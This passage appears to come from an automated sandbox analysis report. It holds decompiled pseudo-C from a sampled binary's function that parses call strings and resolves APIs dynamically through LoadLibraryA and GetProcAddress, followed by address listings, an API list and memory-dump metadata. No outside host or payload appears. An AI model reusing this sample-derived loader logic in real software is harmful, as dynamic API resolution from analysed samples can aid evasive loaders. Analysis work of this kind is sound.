											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E70991A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(3);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x7099305c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x818) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x828) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E70991A36( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
												_t136 = _v16 + 0x41; // 0x41
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x830)) = 0;
												 *((intOrPtr*)(__edi + 0x82c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x82c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x830; // 0x830
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t271 = _t268 - 1;
								__eflags = _t271;
								if(_t271 == 0) {
									_v16 = _t282;
									goto L80;
								}
								__eflags = _t271 != 1;
								if(_t271 != 1) {
									goto L162;
								}
								__eflags = _t285 - 0x6e;
								if(__eflags > 0) {
									_t308 = _t285 - 0x72;
									__eflags = _t308;
									if(_t308 == 0) {
										_push(4);
										L74:
										_pop(_t273);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t329 + 0x810;
											 *_t96 =  *(_t329 + 0x810) &  !_t273;
											__eflags =  *_t96;
										} else {
											 *(_t329 + 0x810) =  *(_t329 + 0x810) | _t273;
										}
										_v8 = 1;
										goto L57;
									}
									_t311 = _t308 - 1;
									__eflags = _t311;
									if(_t311 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t311 != 0;
									if(_t311 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t314 = _t285 - 0x21;
								__eflags = _t314;
								if(_t314 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t315 = _t314 - 0x11;
								__eflags = _t315;
								if(_t315 == 0) {
									_t273 = 0x100;
									goto L75;
								}
								_t316 = _t315 - 0x31;
								__eflags = _t316;
								if(_t316 == 0) {
									_t273 = 1;
									goto L75;
								}
								__eflags = _t316 != 0;
								if(_t316 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t282;
								_v36 = _t282;
								goto L20;
							}
						}
						__eflags =  *((char*)(_t320 - 1)) - 0x3a;
						if( *((char*)(_t320 - 1)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t282;
						if(_v32 == _t282) {
							goto L43;
						}
						goto L17;
					}
					_t276 = _t257 - 5;
					if(_t276 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t282;
							_v20 = _t282;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t282;
							goto L20;
						}
					}
					_t280 = _t276 - 1;
					if(_t280 == 0) {
						__eflags = _v44 - _t282;
						if(_v44 != _t282) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t282;
							_v20 = _t282;
							goto L20;
						}
					}
					if(_t280 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t329 == _t282 ||  *(_t329 + 0x80c) != _t282) {
					L182:
					return _t329;
				} else {
					_t224 =  *_t329 - 1;
					if(_t224 == 0) {
						_t187 = _t329 + 8; // 0x8
						_t323 = _t187;
						__eflags =  *_t323;
						if( *_t323 != 0) {
							_t225 = GetModuleHandleA(_t323); // executed
							__eflags = _t225 - _t282;
							 *(_t329 + 0x808) = _t225;
							if(_t225 != _t282) {
								L171:
								_t192 = _t329 + 0x408; // 0x408
								_t324 = _t192;
								_t226 = E709915C2( *(_t329 + 0x808), _t324);
								__eflags = _t226 - _t282;
								 *(_t329 + 0x80c) = _t226;
								if(_t226 == _t282) {
									__eflags =  *_t324 - 0x23;
									if( *_t324 == 0x23) {
										_t195 = _t329 + 0x409; // 0x409
										_t230 = E709912FE(_t195);
										__eflags = _t230 - _t282;
										if(_t230 != _t282) {
											__eflags = _t230 & 0xffff0000;
											if((_t230 & 0xffff0000) == 0) {
												 *(_t329 + 0x80c) = GetProcAddress( *(_t329 + 0x808), _t230 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t282;
								if(_v52 != _t282) {
									L178:
									_t324[lstrlenA(_t324)] = 0x41;
									_t228 = E709915C2( *(_t329 + 0x808), _t324);
									__eflags = _t228 - _t282;
									if(_t228 != _t282) {
										L166:
										 *(_t329 + 0x80c) = _t228;
										goto L182;
									}
									__eflags =  *(_t329 + 0x80c) - _t282;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t205 = _t329 + 4;
									 *_t205 =  *(_t329 + 4) | 0xffffffff;
									__eflags =  *_t205;
									goto L182;
								} else {
									__eflags =  *(_t329 + 0x80c) - _t282;
									if( *(_t329 + 0x80c) != _t282) {
										goto L182;
									}
									goto L178;
								}
							}
							_t233 = LoadLibraryA(_t323); // executed
							__eflags = _t233 - _t282;
							 *(_t329 + 0x808) = _t233;
							if(_t233 == _t282) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t329 + 0x408; // 0x408
						_t235 = E709912FE(_t188);
						 *(_t329 + 0x80c) = _t235;
						__eflags = _t235 - _t282;
						goto L180;
					}
					_t236 = _t224 - 1;
					if(_t236 == 0) {
						_t185 = _t329 + 0x408; // 0x408
						_t237 = _t185;
						__eflags =  *_t237;
						if( *_t237 == 0) {
							goto L182;
						}
						_t228 = E709912FE(_t237);
						L165:
						goto L166;
					}
					if(_t236 != 1) {
						goto L182;
					}
					_t81 = _t329 + 8; // 0x8
					_t283 = _t81;
					_t325 = E709912FE(_t81);
					 *(_t329 + 0x808) = _t325;
					if(_t325 == 0) {
						goto L181;
					}
					 *(_t329 + 0x84c) =  *(_t329 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x850)) = E70991224(_t283);
					 *(_t329 + 0x83c) =  *(_t329 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t329 + 0x848)) = 1;
					 *((intOrPtr*)(_t329 + 0x838)) = 1;
					_t90 = _t329 + 0x408; // 0x408
					_t228 =  *(_t325->i + E709912FE(_t90) * 4);
					goto L165;
				}
			}



































































                                                                                        0x70991aa0
                                                                                        0x70991aa3
                                                                                        0x70991aa6
                                                                                        0x70991aa9
                                                                                        0x70991aac
                                                                                        0x70991aaf
                                                                                        0x70991ab2
                                                                                        0x70991ab4
                                                                                        0x70991ab7
                                                                                        0x70991aba
                                                                                        0x70991abf
                                                                                        0x70991ac2
                                                                                        0x70991aca
                                                                                        0x70991ad2
                                                                                        0x70991ad4
                                                                                        0x70991ad7
                                                                                        0x70991adf
                                                                                        0x70991adf
                                                                                        0x70991ae4
                                                                                        0x70991ae7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991af1
                                                                                        0x70991af3
                                                                                        0x70991af8
                                                                                        0x70991afa
                                                                                        0x70991b8b
                                                                                        0x70991b8b
                                                                                        0x70991b8b
                                                                                        0x70991b8f
                                                                                        0x70991b92
                                                                                        0x70991b94
                                                                                        0x70991bb6
                                                                                        0x70991bb9
                                                                                        0x70991bbb
                                                                                        0x70991bc4
                                                                                        0x70991bca
                                                                                        0x70991bcc
                                                                                        0x70991bd2
                                                                                        0x70991bd2
                                                                                        0x70991bd8
                                                                                        0x70991bdb
                                                                                        0x70991bdb
                                                                                        0x70991bde
                                                                                        0x70991bde
                                                                                        0x70991be4
                                                                                        0x70991be6
                                                                                        0x70991be9
                                                                                        0x70991bef
                                                                                        0x70991bf2
                                                                                        0x70991bf2
                                                                                        0x70991bf4
                                                                                        0x70991bfa
                                                                                        0x70991bfd
                                                                                        0x70991c21
                                                                                        0x70991c24
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991c27
                                                                                        0x70991c29
                                                                                        0x70991c37
                                                                                        0x70991c3a
                                                                                        0x70991c3c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991c3e
                                                                                        0x70991c3e
                                                                                        0x70991c3e
                                                                                        0x70991c44
                                                                                        0x70991c46
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991c48
                                                                                        0x70991c4a
                                                                                        0x70991c4c
                                                                                        0x70991c4e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991c4e
                                                                                        0x70991c50
                                                                                        0x70991c52
                                                                                        0x70991c54
                                                                                        0x70991c54
                                                                                        0x70991c5a
                                                                                        0x70991c60
                                                                                        0x70991c62
                                                                                        0x70991c76
                                                                                        0x70991c76
                                                                                        0x70991c78
                                                                                        0x70991c64
                                                                                        0x70991c6a
                                                                                        0x70991c6d
                                                                                        0x70991c6d
                                                                                        0x00000000
                                                                                        0x70991bff
                                                                                        0x70991bff
                                                                                        0x70991bff
                                                                                        0x70991c00
                                                                                        0x70991c08
                                                                                        0x70991c0c
                                                                                        0x70991c12
                                                                                        0x70991c16
                                                                                        0x00000000
                                                                                        0x70991c16
                                                                                        0x70991c02
                                                                                        0x70991c02
                                                                                        0x70991c03
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991c05
                                                                                        0x70991c06
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991c06
                                                                                        0x70991b96
                                                                                        0x70991b97
                                                                                        0x70991ba0
                                                                                        0x70991ba3
                                                                                        0x70991bb0
                                                                                        0x70991bb0
                                                                                        0x70991ba5
                                                                                        0x70991ba5
                                                                                        0x70991c7e
                                                                                        0x70991c81
                                                                                        0x70991c84
                                                                                        0x70991cf6
                                                                                        0x70991cfa
                                                                                        0x70991adc
                                                                                        0x00000000
                                                                                        0x70991adc
                                                                                        0x00000000
                                                                                        0x70991cfa
                                                                                        0x70991b94
                                                                                        0x70991b00
                                                                                        0x70991b03
                                                                                        0x70991b66
                                                                                        0x70991b69
                                                                                        0x70991b7a
                                                                                        0x70991b7a
                                                                                        0x70991b7d
                                                                                        0x70991c89
                                                                                        0x70991c8c
                                                                                        0x70991c8c
                                                                                        0x70991c8e
                                                                                        0x70992033
                                                                                        0x70992045
                                                                                        0x70992045
                                                                                        0x70992047
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992037
                                                                                        0x70992038
                                                                                        0x7099203b
                                                                                        0x7099203e
                                                                                        0x709920ba
                                                                                        0x709920c1
                                                                                        0x709920c6
                                                                                        0x709920c9
                                                                                        0x70991cf2
                                                                                        0x70991cf2
                                                                                        0x70991cf2
                                                                                        0x70991cf3
                                                                                        0x00000000
                                                                                        0x70991cf3
                                                                                        0x70992040
                                                                                        0x70992042
                                                                                        0x70992042
                                                                                        0x70992049
                                                                                        0x7099204b
                                                                                        0x709920ae
                                                                                        0x70991ce7
                                                                                        0x70991cea
                                                                                        0x70991ced
                                                                                        0x70991cf0
                                                                                        0x70991cf0
                                                                                        0x00000000
                                                                                        0x70991cf0
                                                                                        0x7099204d
                                                                                        0x7099204f
                                                                                        0x70992055
                                                                                        0x70992055
                                                                                        0x70992057
                                                                                        0x7099205a
                                                                                        0x7099206d
                                                                                        0x7099206d
                                                                                        0x70992070
                                                                                        0x70992073
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992075
                                                                                        0x70992078
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099207a
                                                                                        0x70992081
                                                                                        0x70992081
                                                                                        0x70992087
                                                                                        0x7099208a
                                                                                        0x709920a6
                                                                                        0x7099208c
                                                                                        0x70992095
                                                                                        0x70992098
                                                                                        0x70992098
                                                                                        0x00000000
                                                                                        0x7099208a
                                                                                        0x7099205c
                                                                                        0x7099205f
                                                                                        0x70992062
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992064
                                                                                        0x00000000
                                                                                        0x70992064
                                                                                        0x70992051
                                                                                        0x70992053
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992053
                                                                                        0x70991c94
                                                                                        0x70991c94
                                                                                        0x70991c95
                                                                                        0x70991dde
                                                                                        0x70991dde
                                                                                        0x70991de5
                                                                                        0x70991de8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991df5
                                                                                        0x00000000
                                                                                        0x70991fdb
                                                                                        0x70991fde
                                                                                        0x70991fe1
                                                                                        0x70991fe1
                                                                                        0x70991fe2
                                                                                        0x70991fe5
                                                                                        0x70991fe7
                                                                                        0x70991fe9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991feb
                                                                                        0x70991feb
                                                                                        0x70991fee
                                                                                        0x70992000
                                                                                        0x70992003
                                                                                        0x70992006
                                                                                        0x7099200c
                                                                                        0x00000000
                                                                                        0x7099200c
                                                                                        0x70991ff0
                                                                                        0x70991ff0
                                                                                        0x70991ff2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991ff4
                                                                                        0x70991ff6
                                                                                        0x70991ff8
                                                                                        0x70991ff8
                                                                                        0x70991ff8
                                                                                        0x70991ff9
                                                                                        0x70991ffb
                                                                                        0x70991ffd
                                                                                        0x70991fe1
                                                                                        0x70991fe2
                                                                                        0x70991fe5
                                                                                        0x70991fe7
                                                                                        0x70991fe9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991fe9
                                                                                        0x00000000
                                                                                        0x70991e3c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991e48
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991e2f
                                                                                        0x70991e33
                                                                                        0x70991e37
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991fad
                                                                                        0x70991fb1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991fb7
                                                                                        0x70991fbf
                                                                                        0x70991fc6
                                                                                        0x70991fce
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f15
                                                                                        0x70991f15
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991e51
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099202b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f1d
                                                                                        0x70991f1f
                                                                                        0x70991f1f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099201b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099201f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992027
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f64
                                                                                        0x70991f66
                                                                                        0x70991f66
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f2f
                                                                                        0x70991f31
                                                                                        0x70991f31
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f41
                                                                                        0x70991f43
                                                                                        0x70991f43
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f72
                                                                                        0x70991f74
                                                                                        0x70991f74
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f4c
                                                                                        0x70991f4e
                                                                                        0x70991f4e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f53
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992023
                                                                                        0x7099202d
                                                                                        0x7099202d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f7d
                                                                                        0x70991f81
                                                                                        0x70991f86
                                                                                        0x70991f89
                                                                                        0x70991f8a
                                                                                        0x70991f8d
                                                                                        0x70991f93
                                                                                        0x70991f93
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992013
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f57
                                                                                        0x70991f57
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991e58
                                                                                        0x70991e58
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f6b
                                                                                        0x70991f6d
                                                                                        0x70991f6d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991dfc
                                                                                        0x70991e02
                                                                                        0x70991e05
                                                                                        0x70991e07
                                                                                        0x70991e07
                                                                                        0x70991e0a
                                                                                        0x70991e0e
                                                                                        0x70991e1b
                                                                                        0x70991e1d
                                                                                        0x70991e23
                                                                                        0x70991e23
                                                                                        0x70991e23
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f20
                                                                                        0x70991f20
                                                                                        0x70991f22
                                                                                        0x70991f29
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f67
                                                                                        0x70991f67
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f32
                                                                                        0x70991f32
                                                                                        0x70991f34
                                                                                        0x70991f3b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f44
                                                                                        0x70991f44
                                                                                        0x70991f46
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f75
                                                                                        0x70991f75
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f4f
                                                                                        0x70991f4f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f9b
                                                                                        0x70991f9f
                                                                                        0x70991fa4
                                                                                        0x70991fa7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f59
                                                                                        0x70991f59
                                                                                        0x70991f5c
                                                                                        0x70991f5e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991f6e
                                                                                        0x70991f6e
                                                                                        0x70991f77
                                                                                        0x70991f77
                                                                                        0x70991e5a
                                                                                        0x70991e5a
                                                                                        0x70991e5d
                                                                                        0x70991e64
                                                                                        0x70991e66
                                                                                        0x70991e68
                                                                                        0x70991e6f
                                                                                        0x70991e72
                                                                                        0x70991e77
                                                                                        0x70991e79
                                                                                        0x70991e7b
                                                                                        0x70991e7f
                                                                                        0x70991e85
                                                                                        0x70991e8b
                                                                                        0x70991e8b
                                                                                        0x70991e8d
                                                                                        0x70991e8d
                                                                                        0x70991e8e
                                                                                        0x70991e8e
                                                                                        0x70991e92
                                                                                        0x70991e98
                                                                                        0x70991e9a
                                                                                        0x70991e9e
                                                                                        0x70991ea3
                                                                                        0x70991ea3
                                                                                        0x70991ea5
                                                                                        0x70991ea5
                                                                                        0x70991ea8
                                                                                        0x70991eab
                                                                                        0x70991eb4
                                                                                        0x70991eb7
                                                                                        0x70991eba
                                                                                        0x70991eba
                                                                                        0x70991ebc
                                                                                        0x70991ebf
                                                                                        0x70991ec5
                                                                                        0x70991ecb
                                                                                        0x70991ecb
                                                                                        0x70991ecd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991ed3
                                                                                        0x70991ed3
                                                                                        0x70991ed7
                                                                                        0x70991ede
                                                                                        0x70991f02
                                                                                        0x70991f02
                                                                                        0x70991f06
                                                                                        0x70991f08
                                                                                        0x70991f0b
                                                                                        0x70991f0b
                                                                                        0x70991f0e
                                                                                        0x70991f0e
                                                                                        0x00000000
                                                                                        0x70991f06
                                                                                        0x70991ee3
                                                                                        0x70991ee6
                                                                                        0x70991ee6
                                                                                        0x70991eed
                                                                                        0x70991eef
                                                                                        0x70991ef2
                                                                                        0x70991ef9
                                                                                        0x70991efa
                                                                                        0x70991f00
                                                                                        0x70991f00
                                                                                        0x00000000
                                                                                        0x70991f00
                                                                                        0x70991ef4
                                                                                        0x70991ef7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991ef7
                                                                                        0x70991e87
                                                                                        0x70991e89
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991df5
                                                                                        0x70991c9b
                                                                                        0x70991c9b
                                                                                        0x70991c9c
                                                                                        0x70991ddb
                                                                                        0x00000000
                                                                                        0x70991ddb
                                                                                        0x70991ca2
                                                                                        0x70991ca3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991ca9
                                                                                        0x70991cac
                                                                                        0x70991da0
                                                                                        0x70991da0
                                                                                        0x70991da3
                                                                                        0x70991db8
                                                                                        0x70991dba
                                                                                        0x70991dba
                                                                                        0x70991dbb
                                                                                        0x70991dbe
                                                                                        0x70991dc1
                                                                                        0x70991dcd
                                                                                        0x70991dcd
                                                                                        0x70991dcd
                                                                                        0x70991dc3
                                                                                        0x70991dc3
                                                                                        0x70991dc3
                                                                                        0x70991dd3
                                                                                        0x00000000
                                                                                        0x70991dd3
                                                                                        0x70991da5
                                                                                        0x70991da5
                                                                                        0x70991da6
                                                                                        0x70991db4
                                                                                        0x00000000
                                                                                        0x70991db4
                                                                                        0x70991da9
                                                                                        0x70991daa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991db0
                                                                                        0x00000000
                                                                                        0x70991db0
                                                                                        0x70991cb2
                                                                                        0x70991d9c
                                                                                        0x00000000
                                                                                        0x70991d9c
                                                                                        0x70991cb8
                                                                                        0x70991cb8
                                                                                        0x70991cbb
                                                                                        0x70991ce4
                                                                                        0x00000000
                                                                                        0x70991ce4
                                                                                        0x70991cbd
                                                                                        0x70991cbd
                                                                                        0x70991cc0
                                                                                        0x70991cda
                                                                                        0x00000000
                                                                                        0x70991cda
                                                                                        0x70991cc2
                                                                                        0x70991cc2
                                                                                        0x70991cc5
                                                                                        0x70991cd4
                                                                                        0x00000000
                                                                                        0x70991cd4
                                                                                        0x70991cc8
                                                                                        0x70991cc9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991ccb
                                                                                        0x00000000
                                                                                        0x70991b83
                                                                                        0x70991b83
                                                                                        0x70991b86
                                                                                        0x00000000
                                                                                        0x70991b86
                                                                                        0x70991b7d
                                                                                        0x70991b6b
                                                                                        0x70991b6f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991b71
                                                                                        0x70991b74
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991b74
                                                                                        0x70991b05
                                                                                        0x70991b08
                                                                                        0x70991b3e
                                                                                        0x70991b41
                                                                                        0x00000000
                                                                                        0x70991b47
                                                                                        0x70991b49
                                                                                        0x70991b4d
                                                                                        0x70991b54
                                                                                        0x70991b5b
                                                                                        0x70991b5e
                                                                                        0x70991b61
                                                                                        0x00000000
                                                                                        0x70991b61
                                                                                        0x70991b41
                                                                                        0x70991b0a
                                                                                        0x70991b0b
                                                                                        0x70991b26
                                                                                        0x70991b29
                                                                                        0x00000000
                                                                                        0x70991b2f
                                                                                        0x70991b2f
                                                                                        0x70991b36
                                                                                        0x70991b39
                                                                                        0x00000000
                                                                                        0x70991b39
                                                                                        0x70991b29
                                                                                        0x70991b10
                                                                                        0x00000000
                                                                                        0x70991b16
                                                                                        0x70991b16
                                                                                        0x70991b1d
                                                                                        0x00000000
                                                                                        0x70991b1d
                                                                                        0x70991b10
                                                                                        0x70991d09
                                                                                        0x70991d0e
                                                                                        0x70991d13
                                                                                        0x70991d17
                                                                                        0x709921c6
                                                                                        0x709921cc
                                                                                        0x70991d29
                                                                                        0x70991d2b
                                                                                        0x70991d2c
                                                                                        0x709920f1
                                                                                        0x709920f1
                                                                                        0x709920f4
                                                                                        0x709920f7
                                                                                        0x70992114
                                                                                        0x7099211a
                                                                                        0x7099211c
                                                                                        0x70992122
                                                                                        0x70992139
                                                                                        0x70992139
                                                                                        0x70992139
                                                                                        0x70992146
                                                                                        0x7099214c
                                                                                        0x7099214f
                                                                                        0x70992155
                                                                                        0x70992157
                                                                                        0x7099215a
                                                                                        0x7099215c
                                                                                        0x70992163
                                                                                        0x70992168
                                                                                        0x7099216b
                                                                                        0x7099216d
                                                                                        0x70992172
                                                                                        0x70992184
                                                                                        0x70992184
                                                                                        0x70992172
                                                                                        0x7099216b
                                                                                        0x7099215a
                                                                                        0x7099218a
                                                                                        0x7099218d
                                                                                        0x70992197
                                                                                        0x7099219f
                                                                                        0x709921ab
                                                                                        0x709921b1
                                                                                        0x709921b4
                                                                                        0x709920e6
                                                                                        0x709920e6
                                                                                        0x00000000
                                                                                        0x709920e6
                                                                                        0x709921ba
                                                                                        0x709921c0
                                                                                        0x709921c0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709921c2
                                                                                        0x709921c2
                                                                                        0x709921c2
                                                                                        0x709921c2
                                                                                        0x00000000
                                                                                        0x7099218f
                                                                                        0x7099218f
                                                                                        0x70992195
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992195
                                                                                        0x7099218d
                                                                                        0x70992125
                                                                                        0x7099212b
                                                                                        0x7099212d
                                                                                        0x70992133
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992133
                                                                                        0x709920f9
                                                                                        0x70992100
                                                                                        0x70992106
                                                                                        0x7099210c
                                                                                        0x00000000
                                                                                        0x7099210c
                                                                                        0x70991d32
                                                                                        0x70991d33
                                                                                        0x709920d0
                                                                                        0x709920d0
                                                                                        0x709920d6
                                                                                        0x709920d9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709920e0
                                                                                        0x709920e5
                                                                                        0x00000000
                                                                                        0x709920e5
                                                                                        0x70991d3a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991d40
                                                                                        0x70991d40
                                                                                        0x70991d49
                                                                                        0x70991d4e
                                                                                        0x70991d54
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70991d5a
                                                                                        0x70991d67
                                                                                        0x70991d6d
                                                                                        0x70991d77
                                                                                        0x70991d7d
                                                                                        0x70991d85
                                                                                        0x70991d95
                                                                                        0x00000000
                                                                                        0x70991d95

                                                                                        APIs
                                                                                          • Part of subcall function 70991215: GlobalAlloc.KERNEL32(00000040,70991233,?,709912CF,-7099404B,709911AB,-000000A0), ref: 7099121D
                                                                                        • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 70991BC4
                                                                                        • lstrcpyA.KERNEL32(00000008,?), ref: 70991C0C
                                                                                        • lstrcpyA.KERNEL32(00000408,?), ref: 70991C16
                                                                                        • GlobalFree.KERNEL32 ref: 70991C29
                                                                                        • GlobalFree.KERNEL32 ref: 70991D09
                                                                                        • GlobalFree.KERNEL32 ref: 70991D0E
                                                                                        • GlobalFree.KERNEL32 ref: 70991D13
                                                                                        • GlobalFree.KERNEL32 ref: 70991EFA
                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 70992098
                                                                                        • GetModuleHandleA.KERNELBASE(00000008), ref: 70992114
                                                                                        • LoadLibraryA.KERNELBASE(00000008), ref: 70992125
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 7099217E
                                                                                        • lstrlenA.KERNEL32(00000408), ref: 70992198
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                        • String ID: Nxt
                                                                                        • API String ID: 245916457-3788892007
                                                                                        • Opcode ID: edc0389ecf1a22d82b6c5f4aac84a7ca59b5b8469aa6f4230c5c5590d305fd91
